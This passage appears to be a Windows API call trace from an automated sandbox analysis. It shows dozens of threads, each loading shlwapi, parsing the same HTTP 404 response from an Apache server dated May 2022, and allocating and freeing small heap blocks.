0x77680000 [0218.270] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.270] GetProcessHeap () returned 0x6a0000 [0218.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0218.270] GetProcessHeap () returned 0x6a0000 [0218.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0218.270] GetProcessHeap () returned 0x6a0000 [0218.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 260 os_tid = 0xb5c [0218.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.484] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.484] GetProcessHeap () returned 0x6a0000 [0218.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0218.484] GetProcessHeap () returned 0x6a0000 [0218.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0218.484] GetProcessHeap () returned 0x6a0000 [0218.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 261 os_tid = 0x13a8 [0218.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.728] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.728] GetProcessHeap () returned 0x6a0000 [0218.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0218.728] GetProcessHeap () returned 0x6a0000 [0218.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0218.728] GetProcessHeap () returned 0x6a0000 [0218.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 262 os_tid = 0x9c0 [0218.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.933] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.933] GetProcessHeap () returned 0x6a0000 [0218.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0218.933] GetProcessHeap () returned 0x6a0000 [0218.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0218.933] GetProcessHeap () returned 0x6a0000 [0218.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 263 os_tid = 0xd60 [0219.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.223] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.223] GetProcessHeap () returned 0x6a0000 [0219.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0219.224] GetProcessHeap () returned 0x6a0000 [0219.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0219.224] GetProcessHeap () returned 0x6a0000 [0219.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 264 os_tid = 0x99c [0219.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.433] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.433] GetProcessHeap () returned 0x6a0000 [0219.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0219.433] GetProcessHeap () returned 0x6a0000 [0219.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0219.433] GetProcessHeap () returned 0x6a0000 [0219.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 265 os_tid = 0xd30 [0219.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.894] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.894] GetProcessHeap () returned 0x6a0000 [0219.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0219.894] GetProcessHeap () returned 0x6a0000 [0219.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0219.894] GetProcessHeap () returned 0x6a0000 [0219.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 266 os_tid = 0x428 [0220.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.544] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.544] GetProcessHeap () returned 0x6a0000 [0220.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0220.544] GetProcessHeap () returned 0x6a0000 [0220.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0220.544] GetProcessHeap () returned 0x6a0000 [0220.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 267 os_tid = 0x2fc [0220.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.775] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.775] GetProcessHeap () returned 0x6a0000 [0220.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0220.776] GetProcessHeap () returned 0x6a0000 [0220.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0220.776] GetProcessHeap () returned 0x6a0000 [0220.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 268 os_tid = 0x88c [0220.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.984] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.985] GetProcessHeap () returned 0x6a0000 [0220.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0220.985] GetProcessHeap () returned 0x6a0000 [0220.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0220.985] GetProcessHeap () returned 0x6a0000 [0220.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 269 os_tid = 0x758 [0221.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.339] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.339] GetProcessHeap () returned 0x6a0000 [0221.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0221.339] GetProcessHeap () returned 0x6a0000 [0221.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0221.339] GetProcessHeap () returned 0x6a0000 [0221.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 270 os_tid = 0xb24 [0221.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.543] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.544] GetProcessHeap () returned 0x6a0000 [0221.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0221.544] GetProcessHeap () returned 0x6a0000 [0221.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0221.544] GetProcessHeap () returned 0x6a0000 [0221.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 271 os_tid = 0x8d8 [0221.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.799] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.799] GetProcessHeap () returned 0x6a0000 [0221.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0221.799] GetProcessHeap () returned 0x6a0000 [0221.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0221.800] GetProcessHeap () returned 0x6a0000 [0221.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 Thread: id = 272 os_tid = 0x92c [0222.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.022] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.022] GetProcessHeap () returned 0x6a0000 [0222.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0222.022] GetProcessHeap () returned 0x6a0000 [0222.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0222.022] GetProcessHeap () returned 0x6a0000 [0222.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 Thread: id = 273 os_tid = 0x9a8 [0222.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.283] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.284] GetProcessHeap () returned 0x6a0000 [0222.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0222.284] GetProcessHeap () returned 0x6a0000 [0222.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0222.284] GetProcessHeap () returned 0x6a0000 [0222.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 Thread: id = 274 os_tid = 0xd80 [0222.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.493] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.493] GetProcessHeap () returned 0x6a0000 [0222.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0222.493] GetProcessHeap () returned 0x6a0000 [0222.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0222.493] GetProcessHeap () returned 0x6a0000 [0222.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 Thread: id = 275 os_tid = 0x91c [0222.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.972] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.972] GetProcessHeap () returned 0x6a0000 [0222.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0222.972] GetProcessHeap () returned 0x6a0000 [0222.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0222.972] GetProcessHeap () returned 0x6a0000 [0222.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 Thread: id = 276 os_tid = 0x4ac [0223.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.215] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.215] GetProcessHeap () returned 0x6a0000 [0223.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0223.215] GetProcessHeap () returned 0x6a0000 [0223.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0223.215] GetProcessHeap () returned 0x6a0000 [0223.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 277 os_tid = 0x728 [0223.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.483] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.483] GetProcessHeap () returned 0x6a0000 [0223.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0223.483] GetProcessHeap () returned 0x6a0000 [0223.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0223.483] GetProcessHeap () returned 0x6a0000 [0223.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 278 os_tid = 0xecc [0223.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.640] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.640] GetProcessHeap () returned 0x6a0000 [0223.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0223.640] GetProcessHeap () returned 0x6a0000 [0223.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0223.640] GetProcessHeap () returned 0x6a0000 [0223.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 279 os_tid = 0x1368 [0223.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.825] GetProcessHeap () returned 0x6a0000 [0223.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0223.825] GetProcessHeap () returned 0x6a0000 [0223.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0223.825] GetProcessHeap () returned 0x6a0000 [0223.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 280 os_tid = 0xca8 [0224.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.012] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.012] GetProcessHeap () returned 0x6a0000 [0224.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0224.012] GetProcessHeap () returned 0x6a0000 [0224.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0224.012] GetProcessHeap () returned 0x6a0000 [0224.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 281 os_tid = 0x894 [0224.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.233] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.233] GetProcessHeap () returned 0x6a0000 [0224.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0224.233] GetProcessHeap () returned 0x6a0000 [0224.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0224.233] GetProcessHeap () returned 0x6a0000 [0224.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 282 os_tid = 0x678 [0224.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.477] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.477] GetProcessHeap () returned 0x6a0000 [0224.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0224.478] GetProcessHeap () returned 0x6a0000 [0224.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0224.478] GetProcessHeap () returned 0x6a0000 [0224.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 283 os_tid = 0x13fc [0224.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.754] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.754] GetProcessHeap () returned 0x6a0000 [0224.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0224.754] GetProcessHeap () returned 0x6a0000 [0224.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0224.754] GetProcessHeap () returned 0x6a0000 [0224.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 284 os_tid = 0x2ac [0224.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.976] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.976] GetProcessHeap () returned 0x6a0000 [0224.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0224.976] GetProcessHeap () returned 0x6a0000 [0224.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0224.976] GetProcessHeap () returned 0x6a0000 [0224.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 285 os_tid = 0xf94 [0225.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.179] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.179] GetProcessHeap () returned 0x6a0000 [0225.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0225.179] GetProcessHeap () returned 0x6a0000 [0225.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0225.179] GetProcessHeap () returned 0x6a0000 [0225.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 286 os_tid = 0x850 [0225.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.466] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.466] GetProcessHeap () returned 0x6a0000 [0225.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0225.466] GetProcessHeap () returned 0x6a0000 [0225.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0225.466] GetProcessHeap () returned 0x6a0000 [0225.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 287 os_tid = 0x136c [0225.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.657] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.657] GetProcessHeap () returned 0x6a0000 [0225.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0225.657] GetProcessHeap () returned 0x6a0000 [0225.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0225.657] GetProcessHeap () returned 0x6a0000 [0225.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 288 os_tid = 0x13b8 [0225.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.881] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.881] GetProcessHeap () returned 0x6a0000 [0225.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0225.881] GetProcessHeap () returned 0x6a0000 [0225.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0225.881] GetProcessHeap () returned 0x6a0000 [0225.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 289 os_tid = 0x4d4 [0226.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.152] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 